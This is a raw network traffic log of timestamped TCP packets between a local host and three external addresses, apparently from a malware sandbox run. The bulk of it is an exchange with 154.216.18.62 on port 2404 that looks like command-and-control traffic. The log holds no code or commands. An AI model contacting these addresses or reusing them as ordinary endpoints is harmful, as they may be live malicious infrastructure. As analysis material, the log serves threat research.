                                                                    Dec 11, 2024 10:43:46.600989103 CET49761443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:46.746794939 CET44349761104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:46.746817112 CET44349761104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:46.746876955 CET49761443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:46.746890068 CET44349761104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:46.746907949 CET49761443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:46.746999979 CET49761443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:46.752818108 CET44349761104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:46.752840042 CET44349761104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:46.752892017 CET49761443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:46.752899885 CET44349761104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:46.752923012 CET49761443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:46.752955914 CET49761443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:46.753942966 CET44349761104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:46.754018068 CET49761443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:46.754024029 CET44349761104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:46.754041910 CET44349761104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:46.754100084 CET49761443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:46.755069971 CET49761443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:46.755089045 CET44349761104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:48.491981983 CET497722404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:48.611562014 CET240449772154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:48.611649036 CET497722404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:48.615076065 CET497722404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:48.735563993 CET240449772154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:49.920639038 CET240449772154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:49.976531029 CET497722404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:50.156296015 CET240449772154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:50.163976908 CET497722404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:50.283412933 CET240449772154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:50.285887957 CET497722404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:50.405385017 CET240449772154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:50.749427080 CET240449772154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:50.867177010 CET497722404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:50.904030085 CET497722404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:50.941570044 CET240449772154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:50.944125891 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:51.023330927 CET240449772154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:51.063426018 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:51.063556910 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:51.115215063 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:51.164154053 CET497722404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:51.339401960 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:51.340415001 CET4977980192.168.2.5178.237.33.50
                                                                    Dec 11, 2024 10:43:51.459737062 CET8049779178.237.33.50192.168.2.5
                                                                    Dec 11, 2024 10:43:51.459865093 CET4977980192.168.2.5178.237.33.50
                                                                    Dec 11, 2024 10:43:51.459953070 CET4977980192.168.2.5178.237.33.50
                                                                    Dec 11, 2024 10:43:51.579406977 CET8049779178.237.33.50192.168.2.5
                                                                    Dec 11, 2024 10:43:52.388133049 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:52.429672956 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:52.620301962 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:52.624315023 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:52.712585926 CET8049779178.237.33.50192.168.2.5
                                                                    Dec 11, 2024 10:43:52.712658882 CET4977980192.168.2.5178.237.33.50
                                                                    Dec 11, 2024 10:43:52.724790096 CET497722404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:52.743639946 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:52.743700027 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:52.844186068 CET240449772154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:52.862955093 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.205526114 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.205605030 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.205616951 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.205648899 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.206197977 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.206209898 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.206249952 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.206876993 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.206896067 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.206923008 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.207520962 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.207570076 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.213941097 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.214049101 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.214095116 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.222054958 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.222171068 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.222212076 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.325119972 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.325182915 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.325283051 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.397814989 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.397947073 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.398008108 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.401726961 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.401896000 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.401937962 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.407859087 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.408004045 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.408051968 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.415798903 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.415981054 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.416035891 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.423815012 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.423918009 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.423968077 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.431792021 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.431915045 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.431961060 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.439750910 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.440002918 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.440045118 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.447597980 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.447772980 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.447818041 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.455557108 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.455760956 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.455809116 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.463469982 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.463706017 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.463754892 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.470477104 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.470653057 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.470690012 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.477487087 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.506344080 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.506392956 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.506520033 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.509819031 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.510008097 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.599486113 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.599642038 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.599737883 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.600862026 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.601038933 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.601077080 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.605531931 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.605690002 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.605731964 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.611819029 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.611834049 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.611891031 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.616000891 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.616137981 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.616189957 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.620696068 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.620868921 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.620909929 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.625314951 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.625504971 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.625547886 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.629955053 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.629966974 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.630023003 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.634556055 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.634721994 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.634768963 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.639118910 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.639281988 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.639326096 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.643662930 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.643675089 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.643728018 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.647433043 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.647445917 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.647521973 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.653862000 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.653873920 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.653919935 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.657749891 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.657761097 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.657824039 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.662223101 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.662396908 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.662441015 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.666831970 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.666994095 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.667032957 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.671453953 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.671634912 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.671688080 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.676141024 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.676306963 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.676353931 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.680833101 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.681006908 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.681051016 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.685518026 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.712821960 CET8049779178.237.33.50192.168.2.5
                                                                    Dec 11, 2024 10:43:53.712888956 CET4977980192.168.2.5178.237.33.50
                                                                    Dec 11, 2024 10:43:53.720388889 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.720448017 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.720540047 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.722759962 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.722807884 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.722907066 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.727272987 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.727375031 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.792826891 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.793160915 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.793232918 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.795403004 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.796236992 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.796295881 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.796399117 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.800704002 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.800795078 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.800872087 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.801884890 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.801913977 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.801927090 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.804160118 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.804213047 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.804300070 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.807075024 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.807137012 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.807308912 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.810412884 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.810477018 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.810519934 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.813508034 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.813569069 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.813668966 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.816592932 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.816648006 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.816736937 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.819727898 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.819772959 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.819902897 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.822947025 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.822994947 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.823076963 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.826035976 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.826082945 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.826219082 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.829145908 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.829188108 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.829329967 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.832659006 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.832711935 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.832715988 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.835479975 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.835526943 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.835616112 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.838665009 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.838715076 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.838800907 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.841726065 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.841779947 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.841892958 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.844935894 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.844990015 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.845073938 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.848056078 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.848112106 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.848198891 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.850300074 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.850344896 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.850431919 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.852495909 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.852543116 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.852682114 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.854581118 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.854628086 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.854716063 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.856762886 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.856818914 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.857614040 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.858851910 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.858903885 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.859251022 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.860950947 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.860997915 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.861196995 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.863109112 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.863167048 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.863261938 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.865214109 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.865263939 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.865708113 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.867384911 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.867432117 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.868019104 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.869451046 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.869497061 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.869741917 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.871633053 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.871686935 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.871822119 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.872704029 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.873773098 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.873821974 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.874100924 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.875776052 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.875818968 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.876107931 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.890728951 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.890835047 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.890892982 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.891853094 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.891899109 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.891925097 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.893501997 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.893551111 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.893713951 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.895667076 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.895724058 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.895791054 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.897713900 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.897778988 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.897855043 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.945334911 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.984026909 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.984184980 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.984241962 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.984914064 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.985085011 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.985127926 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.986895084 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.987185001 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.987234116 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.988677025 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.988785982 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.988831997 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.990423918 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.990581036 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.990628958 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.992201090 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.992427111 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.992479086 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.993961096 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.994116068 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.994158983 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.995712996 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.995846033 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.995891094 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.997349977 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.997502089 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.997544050 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:53.999006987 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.999177933 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:53.999219894 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:54.000693083 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:54.000838995 CET240449778154.216.18.62192.168.2.5
